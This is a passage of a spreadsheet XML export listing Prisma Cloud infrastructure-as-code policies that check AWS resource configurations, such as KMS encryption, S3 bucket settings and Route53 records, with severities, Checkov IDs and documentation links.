      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J832" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshiftserverless</t>
        </is>
      </c>
      <c r="K832" t="inlineStr">
        <is>
          <t>Redshift Serverless namespace is not encrypted by KMS using a customer managed key (CMK)</t>
        </is>
      </c>
      <c r="L832" t="inlineStr"/>
      <c r="M832" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N832" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O832" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P832" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q832" t="inlineStr"/>
      <c r="R832" t="inlineStr"/>
      <c r="S832" t="inlineStr"/>
      <c r="T832" t="b">
        <v>0</v>
      </c>
      <c r="U832" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V832" t="inlineStr">
        <is>
          <t>IaC:General:aws-redshiftserverless-namespace</t>
        </is>
      </c>
      <c r="W832" t="inlineStr">
        <is>
          <t>Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK)</t>
        </is>
      </c>
      <c r="X832" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-282</t>
        </is>
      </c>
      <c r="Y832" t="inlineStr"/>
      <c r="Z832" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_redshiftserverless_namespace"]}</t>
        </is>
      </c>
      <c r="AA832" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB832" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC832" t="inlineStr">
        <is>
          <t>CKV_AWS_282</t>
        </is>
      </c>
      <c r="AD832" t="b">
        <v>1</v>
      </c>
      <c r="AE832" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF832" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>c1962537-be4f-4d56-adc8-25a72869c1f4</t>
        </is>
      </c>
      <c r="AI832" t="inlineStr"/>
      <c r="AJ832" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK832" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" t="inlineStr"/>
      <c r="B833" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C833" s="2" t="inlineStr"/>
      <c r="D833" t="inlineStr"/>
      <c r="E833" t="inlineStr"/>
      <c r="F833" t="inlineStr"/>
      <c r="G833" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J833" t="inlineStr">
        <is>
          <t>IaC:General:aws-route53</t>
        </is>
      </c>
      <c r="K833" t="inlineStr">
        <is>
          <t>Route53 A Record does not have Attached Resource</t>
        </is>
      </c>
      <c r="L833" t="inlineStr"/>
      <c r="M833" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N833" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O833" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P833" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q833" t="inlineStr"/>
      <c r="R833" t="inlineStr"/>
      <c r="S833" t="inlineStr"/>
      <c r="T833" t="b">
        <v>0</v>
      </c>
      <c r="U833" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V833" t="inlineStr">
        <is>
          <t>IaC:General:aws-route53-record,aws-instance,aws-eip,aws-elb,aws-lb,aws-route53-record,aws-s3-bucket,aws-api-gateway-domain-name,aws-elastic-beanstalk-environment,aws-vpc-endpoint,aws-globalaccelerator-accelerator,aws-cloudfront-distribution</t>
        </is>
      </c>
      <c r="W833" t="inlineStr">
        <is>
          <t>Route53 A Record has Attached Resource</t>
        </is>
      </c>
      <c r="X833" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource</t>
        </is>
      </c>
      <c r="Y833" t="inlineStr"/>
      <c r="Z833" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_route53_record","aws_instance","aws_eip","aws_elb","aws_lb","aws_route53_record","aws_s3_bucket","aws_api_gateway_domain_name","aws_elastic_beanstalk_environment","aws_vpc_endpoint","aws_globalaccelerator_accelerator","aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA833" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB833" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC833" t="inlineStr">
        <is>
          <t>CKV2_AWS_23</t>
        </is>
      </c>
      <c r="AD833" t="b">
        <v>1</v>
      </c>
      <c r="AE833" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF833" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>2e6640bf-ffdd-4a1a-a6ae-6eb24740cf3d</t>
        </is>
      </c>
      <c r="AI833" t="inlineStr"/>
      <c r="AJ833" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK833" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" t="inlineStr"/>
      <c r="B834" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C834" s="2" t="inlineStr"/>
      <c r="D834" t="inlineStr"/>
      <c r="E834" t="inlineStr"/>
      <c r="F834" t="inlineStr"/>
      <c r="G834" t="b">
        <v>0</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J834" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K834" t="inlineStr">
        <is>
          <t>block_public_acls</t>
        </is>
      </c>
      <c r="L834" t="inlineStr"/>
      <c r="M834" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N834" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O834" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P834" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q834" t="inlineStr"/>
      <c r="R834" t="inlineStr"/>
      <c r="S834" t="inlineStr"/>
      <c r="T834" t="b">
        <v>0</v>
      </c>
      <c r="U834" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V834" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W834" t="inlineStr"/>
      <c r="X834" t="inlineStr"/>
      <c r="Y834" t="inlineStr"/>
      <c r="Z834" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket"],"conditionQuery":{"attribute":"acl","operator":"equals","value":"false","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA834" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB834" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC834" t="inlineStr"/>
      <c r="AD834" t="b">
        <v>0</v>
      </c>
      <c r="AE834" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF834" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>d448ba61-e0ad-4f57-8d47-78dbf6bdc551</t>
        </is>
      </c>
      <c r="AI834" t="inlineStr"/>
      <c r="AJ834" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK834" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" t="inlineStr"/>
      <c r="B835" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C835" s="2" t="inlineStr"/>
      <c r="D835" t="inlineStr"/>
      <c r="E835" t="inlineStr"/>
      <c r="F835" t="inlineStr"/>
      <c r="G835" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J835" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K835" t="inlineStr">
        <is>
          <t>S3 buckets are not encrypted with KMS</t>
        </is>
      </c>
      <c r="L835" t="inlineStr"/>
      <c r="M835" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N835" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O835" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P835" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q835" t="inlineStr"/>
      <c r="R835" t="inlineStr"/>
      <c r="S835" t="inlineStr"/>
      <c r="T835" t="b">
        <v>0</v>
      </c>
      <c r="U835" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V835" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W835" t="inlineStr">
        <is>
          <t>Ensure that S3 buckets are encrypted with KMS by default</t>
        </is>
      </c>
      <c r="X835" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-s3-buckets-are-encrypted-with-kms-by-default</t>
        </is>
      </c>
      <c r="Y835" t="inlineStr"/>
      <c r="Z835" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA835" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB835" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC835" t="inlineStr">
        <is>
          <t>CKV_AWS_145</t>
        </is>
      </c>
      <c r="AD835" t="b">
        <v>1</v>
      </c>
      <c r="AE835" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF835" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>5fdf30b9-35ce-458a-a05e-d0c2dfcfb66f</t>
        </is>
      </c>
      <c r="AI835" t="inlineStr"/>
      <c r="AJ835" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK835" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" t="inlineStr"/>
      <c r="B836" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C836" s="2" t="inlineStr"/>
      <c r="D836" t="inlineStr"/>
      <c r="E836" t="inlineStr"/>
      <c r="F836" t="inlineStr"/>
      <c r="G836" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J836" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K836" t="inlineStr">
        <is>
          <t>S3 bucket lock configuration disabled</t>
        </is>
      </c>
      <c r="L836" t="inlineStr"/>
      <c r="M836" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N836" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O836" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P836" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q836" t="inlineStr"/>
      <c r="R836" t="inlineStr"/>
      <c r="S836" t="inlineStr"/>
      <c r="T836" t="b">
        <v>0</v>
      </c>
      <c r="U836" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V836" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W836" t="inlineStr">
        <is>
          <t>Ensure that S3 bucket has lock configuration enabled by default</t>
        </is>
      </c>
      <c r="X836" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-s3-bucket-has-lock-configuration-enabled-by-default</t>
        </is>
      </c>
      <c r="Y836" t="inlineStr"/>
      <c r="Z836" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA836" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB836" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC836" t="inlineStr">
        <is>
          <t>CKV_AWS_143</t>
        </is>
      </c>
      <c r="AD836" t="b">
        <v>1</v>
      </c>
      <c r="AE836" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF836" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>f87b65d8-230b-4202-8f59-cf1e7c6d5916</t>
        </is>
      </c>
      <c r="AI836" t="inlineStr"/>
      <c r="AJ836" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK836" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" t="inlineStr"/>
      <c r="B837" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C837" s="2" t="inlineStr"/>
      <c r="D837" t="inlineStr"/>
      <c r="E837" t="inlineStr"/>
      <c r="F837" t="inlineStr"/>
      <c r="G837" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J837" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K837" t="inlineStr">
        <is>
          <t>S3 bucket cross-region replication disabled</t>
        </is>
      </c>
      <c r="L837" t="inlineStr"/>
      <c r="M837" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N837" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O837" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P837" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q837" t="inlineStr"/>
      <c r="R837" t="inlineStr"/>
      <c r="S837" t="inlineStr">
        <is>
          <t>Checkov_CLOUD,ruben_checkov</t>
        </is>
      </c>
      <c r="T837" t="b">
        <v>0</v>
      </c>
      <c r="U837" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V837" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W837" t="inlineStr">
        <is>
          <t>Ensure that S3 bucket has cross-region replication enabled</t>
        </is>
      </c>
      <c r="X837" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-s3-bucket-has-cross-region-replication-enabled</t>
        </is>
      </c>
      <c r="Y837" t="inlineStr"/>
      <c r="Z837" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA837" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB837" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC837" t="inlineStr">
        <is>
          <t>CKV_AWS_144</t>
        </is>
      </c>
      <c r="AD837" t="b">
        <v>1</v>
      </c>
      <c r="AE837" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF837" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>f21609ce-3470-4bb9-af23-863afc05e60d</t>
        </is>
      </c>
      <c r="AI837" t="inlineStr"/>
      <c r="AJ837" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK837" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" t="inlineStr"/>
      <c r="B838" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C838" s="2" t="inlineStr"/>
      <c r="D838" t="inlineStr"/>
      <c r="E838" t="inlineStr"/>
      <c r="F838" t="inlineStr"/>
      <c r="G838" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J838" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K838" t="inlineStr">
        <is>
          <t>S3 lifecycle configuration does not set a period for aborting failed uploads</t>
        </is>
      </c>
      <c r="L838" t="inlineStr"/>
      <c r="M838" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N838" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O838" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P838" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q838" t="inlineStr"/>
      <c r="R838" t="inlineStr"/>
      <c r="S838" t="inlineStr"/>
      <c r="T838" t="b">
        <v>0</v>
      </c>
      <c r="U838" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V838" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket-lifecycle-configuration</t>
        </is>
      </c>
      <c r="W838" t="inlineStr">
        <is>
          <t>Ensure S3 lifecycle configuration sets period for aborting failed uploads</t>
        </is>
      </c>
      <c r="X838" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-300</t>
        </is>
      </c>
      <c r="Y838" t="inlineStr"/>
      <c r="Z838" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket_lifecycle_configuration"]}</t>
        </is>
      </c>
      <c r="AA838" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB838" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC838" t="inlineStr">
        <is>
          <t>CKV_AWS_300</t>
        </is>
      </c>
      <c r="AD838" t="b">
        <v>1</v>
      </c>
      <c r="AE838" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF838" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>91986a59-e939-4831-b1d5-f06086df5336</t>
        </is>
      </c>
      <c r="AI838" t="inlineStr"/>
      <c r="AJ838" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK838" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" t="inlineStr"/>
      <c r="B839" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C839" s="2" t="inlineStr"/>
      <c r="D839" t="inlineStr"/>
      <c r="E839" t="inlineStr"/>
      <c r="F839" t="inlineStr"/>
      <c r="G839" t="b">
        <v>1</v>
      </c>
      <c r="H8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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J839" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K839" t="inlineStr">
        <is>
          <t>AWS S3 bucket Object not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L839" t="inlineStr"/>
      <c r="M839" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N839" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O839" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P839" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q839" t="inlineStr"/>
      <c r="R839" t="inlineStr"/>
      <c r="S839" t="inlineStr"/>
      <c r="T839" t="b">
        <v>0</v>
      </c>
      <c r="U839" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V839" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-bucket-object</t>
        </is>
      </c>
      <c r="W839" t="inlineStr">
        <is>
          <t>Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X839" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106</t>
        </is>
      </c>
      <c r="Y839" t="inlineStr"/>
      <c r="Z839" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_bucket_object"]}</t>
        </is>
      </c>
      <c r="AA839" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB839" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC839" t="inlineStr">
        <is>
          <t>CKV_AWS_186</t>
        </is>
      </c>
      <c r="AD839" t="b">
        <v>1</v>
      </c>
      <c r="AE839" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF839" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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39" t="inlineStr">
        <is>
          <t>5d5127c5-9ff5-4c17-b26e-114650e4a20f</t>
        </is>
      </c>
      <c r="AI839" t="inlineStr"/>
      <c r="AJ839" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK839" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" t="inlineStr"/>
      <c r="B840" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C840" s="2" t="inlineStr"/>
      <c r="D840" t="inlineStr"/>
      <c r="E840" t="inlineStr"/>
      <c r="F840" t="inlineStr"/>
      <c r="G840" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J840" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3</t>
        </is>
      </c>
      <c r="K840" t="inlineStr">
        <is>
          <t>AWS S3 Object Copy not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L840" t="inlineStr"/>
      <c r="M840" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N840" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O840" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P840" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q840" t="inlineStr"/>
      <c r="R840" t="inlineStr"/>
      <c r="S840" t="inlineStr"/>
      <c r="T840" t="b">
        <v>0</v>
      </c>
      <c r="U840" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V840" t="inlineStr">
        <is>
          <t>IaC:General:aws-s3-object-copy</t>
        </is>
      </c>
      <c r="W840" t="inlineStr">
        <is>
          <t>Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X840" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101</t>
        </is>
      </c>
      <c r="Y840" t="inlineStr"/>
      <c r="Z840" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_s3_object_copy"]}</t>
        </is>
      </c>
      <c r="AA840" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB840" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC840" t="inlineStr">
        <is>
          <t>CKV_AWS_181</t>
        </is>
      </c>
      <c r="AD840" t="b">
        <v>1</v>
      </c>
      <c r="AE840" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF840" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>506e2eb5-671a-4282-9c32-746d4f0abe4e</t>
        </is>
      </c>
      <c r="AI840" t="inlineStr"/>
      <c r="AJ840" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK840" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" t="inlineStr"/>
      <c r="B841" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C841" s="2" t="inlineStr"/>
      <c r="D841" t="inlineStr"/>
      <c r="E841" t="inlineStr"/>
      <c r="F841" t="inlineStr"/>
      <c r="G841" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J841" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K841" t="inlineStr">
        <is>
          <t>AWS Sagemaker data quality job not using KMS to encrypt data on attached storage volume</t>
        </is>
      </c>
      <c r="L841" t="inlineStr"/>
      <c r="M841" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N841" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O841" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P841" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q841" t="inlineStr"/>
      <c r="R841" t="inlineStr"/>
      <c r="S841" t="inlineStr"/>
      <c r="T841" t="b">
        <v>0</v>
      </c>
      <c r="U841" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V841" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-data-quality-job-definition</t>
        </is>
      </c>
      <c r="W841" t="inlineStr">
        <is>
          <t>Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume</t>
        </is>
      </c>
      <c r="X841" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-368</t>
        </is>
      </c>
      <c r="Y841" t="inlineStr"/>
      <c r="Z841" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_data_quality_job_definition"]}</t>
        </is>
      </c>
      <c r="AA841" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB841" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC841" t="inlineStr">
        <is>
          <t>CKV_AWS_368</t>
        </is>
      </c>
      <c r="AD841" t="b">
        <v>1</v>
      </c>
      <c r="AE841" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF841" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>d9fd5ad2-b0ce-44e4-98c8-242499c852ee</t>
        </is>
      </c>
      <c r="AI841" t="inlineStr"/>
      <c r="AJ841" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK841" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" t="inlineStr"/>
      <c r="B842" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C842" s="2" t="inlineStr"/>
      <c r="D842" t="inlineStr"/>
      <c r="E842" t="inlineStr"/>
      <c r="F842" t="inlineStr"/>
      <c r="G842" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J842" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K842" t="inlineStr">
        <is>
          <t>AWS Sagemaker data quality job not encrypting model artifacts with KMS</t>
        </is>
      </c>
      <c r="L842" t="inlineStr"/>
      <c r="M842" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N842" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O842" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P842" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
